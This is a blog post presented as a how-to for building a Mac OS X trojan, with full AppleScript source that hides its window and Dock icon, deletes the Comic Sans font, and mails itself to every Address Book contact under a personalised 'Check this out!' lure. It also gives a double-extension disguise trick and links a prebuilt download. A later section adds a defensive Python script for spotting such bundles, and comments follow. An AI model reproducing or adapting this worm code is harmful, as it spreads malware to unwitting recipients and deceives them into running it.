howto: build your own mac os x trojan


In 13 easy steps:

  1. Start up XCode; if you don’t have the Mac OS X Developer Tools installed, sign up and download them from ADC.
  2. Select “File -> New Project…”
  3. Choose “AppleScript Application”, name it, and choose the location on your hard drive for the project folder. We’re going to call this “SNOB32”.
  4. Double-click “MainMenu.nib”.
  5. Click on the main window — it should be, craftily enough, called “Window” — and pull up the NSWindow Inspector (command-shift-I).
  6. Uncheck “Visible at Launch Time”.
  7. Press command-8 to get to the “AppleScript” portion of the NSWindow Inspector window. Check off “Nib” and check off “SNOB32.applescript” down at the bottom.
  8. Save your NIB file (NIB stands for NeXT Interface Builder). Go back to XCode.
  9. Double-click “SNOB32.applescript”.
  10. In the script file, you should now see a handler that looks like:

    on awake from nib theObject
        (*Add your script here.*)
    end awake from nib

    Essentially, “awake from nib” runs as soon as the objects in the nib have been loaded, which for this app means as soon as it launches; nothing has to be clicked. See the line where it says “(*Add your script here.*)”? You’re going to delete that line and paste this chunk of code in:

    --this does the evil stuff
    tell application "Finder"
        --removes Comic Sans from the /Library/Fonts folder
        try
            move file "Comic Sans MS" in folder "Fonts" in folder "Library" of startup disk to trash
        end try

        --removes Comic Sans from the ~/Library/Fonts folder
        try
            move file "Comic Sans MS" in folder "Fonts" in folder "Library" of home to trash
        end try
    end tell
    --this ends the evil

    --this propagates the trojan via email
    tell application "Address Book"
        launch

        --get the user's name from the "me" card
        set first_user_name to first name of my card as string
        set last_user_name to last name of my card as string
        set user_name to first_user_name & " " & last_user_name

        --the attachment is this application bundle itself
        set pathscript to path to me

        --run through all the entries in the address book
        repeat with this_person in every person

            --reset per entry, so a contact with no email address
            --does not reuse the previous contact's address
            set address_book_email to null

            --get the person's personal data out of the address book
            set first_name to first name of this_person as string
            set last_name to last name of this_person as string
            set address_book_entry_name to first_name & " " & last_name

            --use the first email address listed for this entry, if there is one
            if (count of emails of this_person) > 0 then
                set address_book_email to value of first email of this_person
            end if

            --make sure the entry is not the user
            if address_book_entry_name is not equal to user_name then

                --make sure the entry is not a business (no first or last name set)
                if address_book_entry_name is not equal to "missing value missing value" then

                    --make sure there's an email address to send to
                    if address_book_email is not equal to null then

                        --start the con
                        set subjectLine_string to "Hey, " & first_name & "!" as string
                        set messageText_string to return & "Check this out!:" & return & return & "~" & first_user_name & return as string
                        set myrecipient_string to address_book_email as string

                        --create and send the mail
                        tell application "Mail"
                            set mymail to (make new outgoing message at the beginning of outgoing messages with properties {subject:subjectLine_string, content:messageText_string})
                            tell mymail to make new to recipient at beginning of to recipients with properties {address:myrecipient_string}
                            tell mymail
                                tell content
                                    make new attachment with properties {file name:pathscript} at after the last word of the last paragraph
                                end tell
                            end tell
                            set visible of mymail to true
                            send mymail
                        end tell
                        delay 5
                    end if
                end if
            end if
        end repeat
    end tell

    quit

  11. Save and close the window. Open the “Info.plist” XML file and add two lines inside its top-level <dict> (around line 31 in the generated file): an entry for NSUIElement surrounded in “key” tags, and an entry for 1 surrounded by “string” tags. Like so:

    <key>NSUIElement</key>
    <string>1</string>

    This marks the app as a background “agent”: no Dock icon and no menu bar, so nothing shows on screen while the script runs. (Apple’s current documentation spells this key LSUIElement; NSUIElement is the older spelling.)

  12. Up under the “Project” menu, pull down to “Set Active Build Configuration” and select “Release”.
  13. Click “Build”.

…you’ll now have a folder called “SNOB32”; in that folder will be a folder called “Build” and in that folder, “Release”, and in that folder: the dreaded SNOB32.app. Congratulations, you’ve built yourself a trojan*. Mail it off to your Mac-using friends, and suffer their immediate hatred and scorn.

Just so we’re clear: this app will move the user’s copy of “Comic Sans MS” to the trash, then it will use the Apple Address Book and Apple Mail to mail itself to everyone it can find in the user’s address book with an email address. It also uses the information in the address book to add a believable, personalized message to each outgoing message — all the better to trick potential victims. You could even name your project LOLAWESOMEPIC.jpeg; the bundle is really LOLAWESOMEPIC.jpeg.app, but since Finder and Mail hide the “.app” extension, LOLAWESOMEPIC.jpeg is what will show up in the recipient’s mail window.**

Now, because this admittedly sloppy little proof-of-concept app only disables the much-hated font Comic Sans, this could become the first trojan in history that propagates among users willingly. But imagine if the payload were a bit more malevolent?
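The two tricks the build relies on (an Info.plist agent flag so nothing appears on screen, and a document-looking name in front of a hidden “.app”) are also the two things a recipient or a mail gateway can check for before opening an attachment. The following is an added example, not code from this post: a small Python triage script that looks at a received .app bundle for exactly those two signs. The heuristics, the list of decoy suffixes and the sample bundles it builds in a temporary directory are all constructed for the example; it needs only the standard library.

```python
import os
import plistlib
import tempfile

# Info.plist keys that make an app run as a faceless "agent": no Dock icon,
# no menu bar, nothing on screen while its script runs. NSUIElement is the
# older spelling used in the build steps above; LSUIElement is the current one.
HIDDEN_UI_KEYS = ("NSUIElement", "LSUIElement")

# Document-looking suffixes that may sit in front of the (hidden) ".app",
# as in "LOLAWESOMEPIC.jpeg.app". Constructed list; extend as needed.
DECOY_SUFFIXES = (".jpeg", ".jpg", ".png", ".gif", ".pdf", ".txt", ".doc", ".mov")


def triage_app_bundle(bundle_path):
    """Return a list of human-readable findings for one .app bundle.

    An empty list means none of the heuristics fired.
    """
    findings = []
    bundle_name = os.path.basename(os.path.normpath(bundle_path))
    if not bundle_name.lower().endswith(".app"):
        return ["not an .app bundle: " + bundle_name]

    # Check 1: double extension. Finder and Mail hide the trailing ".app",
    # so the recipient sees what looks like an image or a document.
    stem = bundle_name[:-len(".app")]
    if stem.lower().endswith(DECOY_SUFFIXES):
        findings.append("decoy name: '%s' is an application shown as a document" % bundle_name)

    # Check 2: agent flag in Contents/Info.plist. plistlib returns "1" for a
    # <string>, True for <true/> and 1 for an <integer>; normalise via str().
    plist_path = os.path.join(bundle_path, "Contents", "Info.plist")
    try:
        with open(plist_path, "rb") as fh:
            info = plistlib.load(fh)
    except (OSError, plistlib.InvalidFileException):
        findings.append("missing or unreadable Contents/Info.plist")
        return findings

    for key in HIDDEN_UI_KEYS:
        if str(info.get(key, "")).strip() in ("1", "True", "true"):
            findings.append("%s set: app hides its Dock icon and menu bar" % key)
    return findings


def make_sample_bundle(root, bundle_name, hidden_ui):
    """Write a minimal, Info.plist-only bundle under root and return its path.

    Constructed fixture for the demo; it contains no executable code.
    """
    contents = os.path.join(root, bundle_name, "Contents")
    os.makedirs(contents)
    info = {"CFBundleName": bundle_name[:-len(".app")], "CFBundlePackageType": "APPL"}
    if hidden_ui:
        info["NSUIElement"] = "1"  # exactly the two lines added in step 11
    with open(os.path.join(contents, "Info.plist"), "wb") as fh:
        plistlib.dump(info, fh)
    return os.path.join(root, bundle_name)


def demo():
    """Build one decoy bundle and one plain bundle, triage both, return results."""
    with tempfile.TemporaryDirectory() as root:
        decoy = make_sample_bundle(root, "LOLAWESOMEPIC.jpeg.app", hidden_ui=True)
        plain = make_sample_bundle(root, "SNOB32.app", hidden_ui=False)
        return {"decoy": triage_app_bundle(decoy), "plain": triage_app_bundle(plain)}


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, findings or ["no findings"])
```

Point it at a real bundle with `triage_app_bundle("/path/to/Something.app")`. Either finding on its own is not proof of anything (plenty of legitimate menu-bar utilities set LSUIElement), but an unsolicited attachment that trips both is exactly the case described in this post.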

~jeff

* If you don’t feel like building it yourself, you can download the final trojan horse created by the above code here. REMINDER: YOU ARE DOWNLOADING A TROJAN HORSE. If you’d like to try a test version of the trojan that does everything but actually send the mails, try this one. I am going to p0wn your copy of “Comic Sans”, however.

** To Apple’s credit, Apple Mail does warn the user that they’re opening an executable program, but these days, that’s the very least you can do. Even Microsoft does this. In my opinion: direct execution of attached .app bundles received via email should be explained further, hindered or delayed like the installation of Firefox and Thunderbird extensions, or ideally, disallowed completely.

11 thoughts on “howto: build your own mac os x trojan”

  1. Does this mean that if I have Comic Sans set as the font in which I read email, that I won’t be able to open Mail.app any more?

  2. No, it just means that you’ll be freed from Comic Sans. It’ll show up in whatever’s next in line alphabetically.

    Which means you’ll be left with Courier. Shudder.
